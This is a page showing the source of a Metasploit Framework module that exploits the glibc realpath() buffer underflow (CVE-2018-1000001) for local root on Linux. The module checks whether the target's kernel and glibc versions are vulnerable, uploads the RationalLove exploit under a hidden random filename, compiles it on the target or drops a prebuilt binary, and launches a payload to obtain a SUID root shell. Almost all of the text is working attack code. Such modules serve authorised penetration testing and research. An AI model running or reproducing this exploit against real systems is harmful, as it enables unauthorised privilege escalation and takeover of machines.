Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/local/glibc_realpath_priv_esc.rb
19934 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = NormalRanking

8


9
  include Msf::Post::File

10
  include Msf::Post::Linux::Priv

11
  include Msf::Post::Linux::System

12
  include Msf::Post::Linux::Kernel

13
  include Msf::Exploit::EXE

14
  include Msf::Exploit::FileDropper

15
  prepend Msf::Exploit::Remote::AutoCheck

16


17
  def initialize(info = {})

18
    super(

19
      update_info(

20
        info,

21
        'Name' => "glibc 'realpath()' Privilege Escalation",

22
        'Description' => %q{

23
          This module attempts to gain root privileges on Linux systems by abusing

24
          a vulnerability in GNU C Library (glibc) version 2.26 and prior.

25


26
          This module uses halfdog's RationalLove exploit to exploit a buffer

27
          underflow in glibc realpath() and create a SUID root shell. The exploit

28
          has offsets for glibc versions 2.23-0ubuntu9 and 2.24-11+deb9u1.

29


30
          The target system must have unprivileged user namespaces enabled.

31


32
          This module has been tested successfully on Ubuntu Linux 16.04.3 (x86_64)

33
          with glibc version 2.23-0ubuntu9; and Debian 9.0 (x86_64) with glibc

34
          version 2.24-11+deb9u1.

35
        },

36
        'License' => MSF_LICENSE,

37
        'Author' => [

38
          'halfdog', # Discovery and RationalLove.c exploit

39
          'bcoles' # Metasploit

40
        ],

41
        'DisclosureDate' => '2018-01-16',

42
        'Platform' => [ 'linux' ],

43
        'Arch' => [ ARCH_X86, ARCH_X64 ],

44
        'SessionTypes' => [ 'shell', 'meterpreter' ],

45
        'Targets' => [[ 'Auto', {} ]],

46
        'Privileged' => true,

47
        'References' => [

48
          [ 'BID', '102525' ],

49
          [ 'CVE', '2018-1000001' ],

50
          [ 'EDB', '43775' ],

51
          [ 'URL', 'https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/' ],

52
          [ 'URL', 'http://www.openwall.com/lists/oss-security/2018/01/11/5' ],

53
          [ 'URL', 'https://securitytracker.com/id/1040162' ],

54
          [ 'URL', 'https://sourceware.org/bugzilla/show_bug.cgi?id=22679' ],

55
          [ 'URL', 'https://usn.ubuntu.com/3534-1/' ],

56
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1533836' ]

57
        ],

58
        'DefaultTarget' => 0,

59
        'Notes' => {

60
          'AKA' => ['RationalLove.c'],

61
          'Stability' => UNKNOWN_STABILITY,

62
          'Reliability' => UNKNOWN_RELIABILITY,

63
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

64
        },

65
        'Compat' => {

66
          'Meterpreter' => {

67
            'Commands' => %w[

68
              stdapi_fs_delete_file

69
            ]

70
          }

71
        }

72
      )

73
    )

74
    register_options [

75
      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ])

76
    ]

77
    register_advanced_options [

78
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])

79
    ]

80
  end

81


82
  def base_dir

83
    datastore['WritableDir'].to_s

84
  end

85


86
  def upload(path, data)

87
    print_status "Writing '#{path}' (#{data.size} bytes) ..."

88
    write_file path, data

89
    register_file_for_cleanup path

90
  end

91


92
  def upload_and_chmodx(path, data)

93
    upload path, data

94
    cmd_exec "chmod +x '#{path}'"

95
  end

96


97
  def upload_and_compile(path, data)

98
    upload "#{path}.c", data

99


100
    gcc_cmd = "gcc -w -o #{path} #{path}.c"

101
    if session.type.eql? 'shell'

102
      gcc_cmd = "PATH=$PATH:/usr/bin/ #{gcc_cmd}"

103
    end

104
    output = cmd_exec gcc_cmd

105


106
    unless output.blank?

107
      print_error output

108
      fail_with Failure::Unknown, "#{path}.c failed to compile"

109
    end

110


111
    register_file_for_cleanup path

112
    cmd_exec "chmod +x #{path}"

113
  end

114


115
  def strip_comments(c_code)

116
    c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '')

117
  end

118


119
  def exploit_data(file)

120
    ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-1000001', file)

121
  end

122


123
  def live_compile?

124
    return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')

125


126
    if has_gcc?

127
      vprint_good 'gcc is installed'

128
      return true

129
    end

130


131
    unless datastore['COMPILE'].eql? 'Auto'

132
      fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'

133
    end

134
  end

135


136
  def check

137
    version = kernel_release

138
    if Rex::Version.new(version.split('-').first) < Rex::Version.new('2.6.36')

139
      vprint_error "Linux kernel version #{version} is not vulnerable"

140
      return CheckCode::Safe

141
    end

142
    vprint_good "Linux kernel version #{version} is vulnerable"

143


144
    arch = kernel_hardware

145
    unless arch.include? 'x86_64'

146
      vprint_error "System architecture #{arch} is not supported"

147
      return CheckCode::Safe

148
    end

149
    vprint_good "System architecture #{arch} is supported"

150


151
    version = glibc_version

152
    if Rex::Version.new(version.split('-').first) > Rex::Version.new('2.26')

153
      vprint_error "GNU C Library version #{version} is not vulnerable"

154
      return CheckCode::Safe

155
    end

156
    vprint_good "GNU C Library version #{version} is vulnerable"

157


158
    # fuzzy match glibc 2.23-0ubuntu9 and 2.24-11+deb9u1

159
    glibc_banner = cmd_exec('ldd --version')

160
    unless glibc_banner.include?('2.23-0ubuntu') || glibc_banner.include?('2.24-11+deb9')

161
      vprint_error 'No offsets for this version of GNU C Library'

162
      return CheckCode::Safe

163
    end

164


165
    config = kernel_config

166
    if config.nil?

167
      vprint_error 'Could not retrieve kernel config'

168
      return CheckCode::Unknown

169
    end

170


171
    unless config.include? 'CONFIG_USER_NS=y'

172
      vprint_error 'Kernel config does not include CONFIG_USER_NS'

173
      return CheckCode::Safe

174
    end

175
    vprint_good 'Kernel config has CONFIG_USER_NS enabled'

176


177
    unless userns_enabled?

178
      vprint_error 'Unprivileged user namespaces are not permitted'

179
      return CheckCode::Safe

180
    end

181
    vprint_good 'Unprivileged user namespaces are permitted'

182


183
    CheckCode::Appears

184
  end

185


186
  def exploit

187
    if !datastore['ForceExploit'] && is_root?

188
      fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')

189
    end

190


191
    unless writable? base_dir

192
      fail_with Failure::BadConfig, "#{base_dir} is not writable"

193
    end

194


195
    unless writable? base_dir

196
      fail_with Failure::BadConfig, "#{base_dir} is not writable"

197
    end

198


199
    # Upload exploit executable

200
    executable_name = ".#{rand_text_alphanumeric rand(5..10)}"

201
    @executable_path = "#{base_dir}/#{executable_name}"

202
    if live_compile?

203
      vprint_status 'Live compiling exploit on system...'

204
      upload_and_compile @executable_path, strip_comments(exploit_data('RationalLove.c'))

205
    else

206
      vprint_status 'Dropping pre-compiled exploit on system...'

207
      upload_and_chmodx @executable_path, exploit_data('RationalLove')

208
    end

209


210
    # Upload payload executable

211
    payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"

212
    upload_and_chmodx payload_path, generate_payload_exe

213


214
    # Launch exploit

215
    print_status 'Launching exploit...'

216
    output = cmd_exec "echo '#{payload_path} & exit' | #{@executable_path}", nil, 30

217
    output.each_line { |line| vprint_status line.chomp }

218
  end

219


220
  def on_new_session(client)

221
    # remove root owned SUID executable

222
    if client.type.eql? 'meterpreter'

223
      client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi'

224
      client.fs.file.rm @executable_path

225
    else

226
      client.shell_command_token "rm #{@executable_path}"

227
    end

228
  end

229
end

230


231